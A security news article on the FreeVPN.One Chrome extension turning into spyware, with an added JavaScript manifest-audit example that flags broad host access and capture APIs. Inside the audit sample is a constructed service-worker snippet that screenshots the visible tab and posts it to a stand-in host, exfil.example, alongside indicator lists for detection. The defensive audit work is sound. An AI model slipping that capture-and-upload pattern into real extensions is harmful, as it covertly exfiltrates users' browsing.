
Trusted Chrome VPN Caught Spying on Users

Summary

– FreeVPN.One, a Chrome extension with over 100,000 installs, turned malicious and is now spying on users’ online activities.
– The malicious behavior began with an update in April 2025 that requested broad host permissions, giving the extension access to every site a user visits.
– In July 2025, it started silently capturing screenshots of every webpage and collecting personal information without user consent.
– It uses a two-stage process: a content script signals a background service worker, which calls Chrome’s captureVisibleTab() API and uploads the screenshot and associated data to an attacker-controlled domain.
– The developer added encryption and domain changes to obfuscate the activity, and a fake “Scan with AI” feature serves as a smokescreen.

A widely used Chrome VPN extension, previously trusted by over a hundred thousand users, has been exposed as a sophisticated spyware tool actively harvesting personal data without consent. The FreeVPN.One extension, which once appeared legitimate and even carried Google’s “Verified” status, began secretly capturing screenshots of users’ browsing activity and exfiltrating sensitive information following a series of deceptive updates earlier this year.

Researchers at Koi Security uncovered the malicious behavior after tracking several updates to the extension. In April 2025, version 3.0.3 introduced broad new permissions that allowed the extension to monitor every site a user visited. That update did not yet capture anything itself, but it laid the groundwork for the more invasive actions that followed. By mid-July, with the release of version 3.1.3, the extension started silently taking screenshots of active browser tabs and collecting personal data.

The surveillance mechanism operates through a two-stage process. A content script is injected into all HTTP and HTTPS pages and waits a deliberate 1.1 seconds so that the capture reflects the fully rendered page, then signals the extension’s background service worker. The service worker calls Chrome’s captureVisibleTab() API to take a screenshot with no visual indication to the user; because the extension holds the <all_urls> host permission, that call succeeds on any tab without a user gesture or prompt. Each image, along with the page URL, tab ID, and a unique user identifier, is uploaded to a remote server controlled by the attackers.
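The permission changes described above are the kind of thing an update-time audit can catch before the capture code ever runs. The following is an added example, not code from the extension or from Koi Security: it diffs the permissions of two manifest versions and scores a manifest together with its service-worker source for the combination the article describes (broad host access plus captureVisibleTab plus an outbound upload). The manifests, the snippet of service-worker source, and the `exfil.example` domain are constructed for the example.

```javascript
// Added example: audit Chrome extension manifests for the permission pattern
// described in the article. Runs under Node with no browser APIs.

// Host patterns that grant access to every site the user visits.
const BROAD_HOST_PATTERNS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];
// API permissions that, combined with broad host access, enable page observation.
const SENSITIVE_API_PERMISSIONS = new Set(["tabs", "scripting", "webRequest", "cookies", "history"]);
// Source-level indicators that deserve a manual look when paired with broad host access.
const SOURCE_INDICATORS = ["captureVisibleTab", "chrome.scripting.executeScript", "fetch(", "XMLHttpRequest"];

function isBroadHost(pattern) {
  return BROAD_HOST_PATTERNS.includes(pattern.trim());
}

// Every host pattern an MV3 manifest claims: host_permissions plus content_scripts matches.
function hostPatterns(manifest) {
  const fromHost = manifest.host_permissions || [];
  const fromScripts = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  return [...new Set([...fromHost, ...fromScripts])];
}

// Permissions and host patterns the new version requests that the old one did not.
// This is the check that would have flagged the April (host access) and July (tabs/scripting) updates.
function diffPermissions(oldManifest, newManifest) {
  const oldPerms = new Set(oldManifest.permissions || []);
  const oldHosts = new Set(hostPatterns(oldManifest));
  return {
    addedPermissions: (newManifest.permissions || []).filter((p) => !oldPerms.has(p)),
    addedHosts: hostPatterns(newManifest).filter((h) => !oldHosts.has(h)),
  };
}

// Score one manifest plus the text of its background/service-worker source.
// Returns findings and a coarse risk level so a caller can gate installs or updates.
function auditExtension(manifest, sourceText) {
  const findings = [];
  const broad = hostPatterns(manifest).filter(isBroadHost);
  if (broad.length) findings.push(`broad host access: ${broad.join(", ")}`);
  const sensitive = (manifest.permissions || []).filter((p) => SENSITIVE_API_PERMISSIONS.has(p));
  if (sensitive.length) findings.push(`sensitive API permissions: ${sensitive.join(", ")}`);
  const indicators = SOURCE_INDICATORS.filter((s) => sourceText.includes(s));
  if (indicators.length) findings.push(`source indicators: ${indicators.join(", ")}`);

  let risk = "low";
  if (broad.length) risk = "medium"; // can read every page, even without a capture API
  const capturesPages = indicators.includes("captureVisibleTab");
  const injectsAndUploads = sensitive.includes("scripting") && indicators.includes("fetch(");
  if (broad.length && (capturesPages || injectsAndUploads)) risk = "high";
  return { broad, sensitive, indicators, findings, risk };
}

// Constructed manifests: a VPN extension that only needs proxy control, then the
// same extension after an update that mirrors the behaviour the article describes.
const manifestBefore = {
  manifest_version: 3, name: "Example VPN", version: "3.0.2",
  permissions: ["proxy", "storage"],
  host_permissions: [],
};
const manifestAfter = {
  manifest_version: 3, name: "Example VPN", version: "3.1.3",
  permissions: ["proxy", "storage", "tabs", "scripting"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["http://*/*", "https://*/*"], js: ["content.js"] }],
};
// Constructed service-worker snippet (not the extension's code): a message from the
// content script triggers a capture that is posted to an assumed exfil host.
const serviceWorkerSource = `
chrome.runtime.onMessage.addListener((msg, sender) => {
  if (msg.type === "pageReady") {
    chrome.tabs.captureVisibleTab(sender.tab.windowId, { format: "png" }, (img) => {
      fetch("https://exfil.example/upload", { method: "POST", body: JSON.stringify({ img }) });
    });
  }
});
`;

console.log("update diff:", JSON.stringify(diffPermissions(manifestBefore, manifestAfter)));
console.log("audit:", JSON.stringify(auditExtension(manifestAfter, serviceWorkerSource), null, 2));
```

The diff step is the one that matters operationally: the original extension had a plausible permission set, and the risk only appeared across versions. Auditing the current manifest alone gives you the "high" verdict; auditing the delta tells you which update to roll back.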

To conceal its activities, the developers later incorporated AES-256 encryption of the uploaded payloads and switched domains, moving from aitd.one to a new subdomain, scan.aitd.one. Researchers believe this was a deliberate attempt to evade detection: encrypting the payload before upload defeats content inspection of the outbound traffic, and changing the destination sidesteps blocklists built on the original domain.

A feature labeled “Scan with AI Threat Detection,” introduced in a July update, attempted to legitimize the screenshot collection by referencing it in the privacy policy. However, security experts have dismissed this as a diversion tactic meant to mislead users about the true intent of the data harvesting.

The extension had accumulated a 3.8-star rating from more than a thousand reviews before its malicious turn, highlighting how easily harmful software can masquerade as legitimate services in official marketplaces. Users are urged to exercise extreme caution with free VPN offerings and to regularly review extension permissions; in Chrome, the Details page for each extension under chrome://extensions shows its site access, which can be restricted to specific sites or to on-click only rather than all sites.

(Source: InfoSecurity)
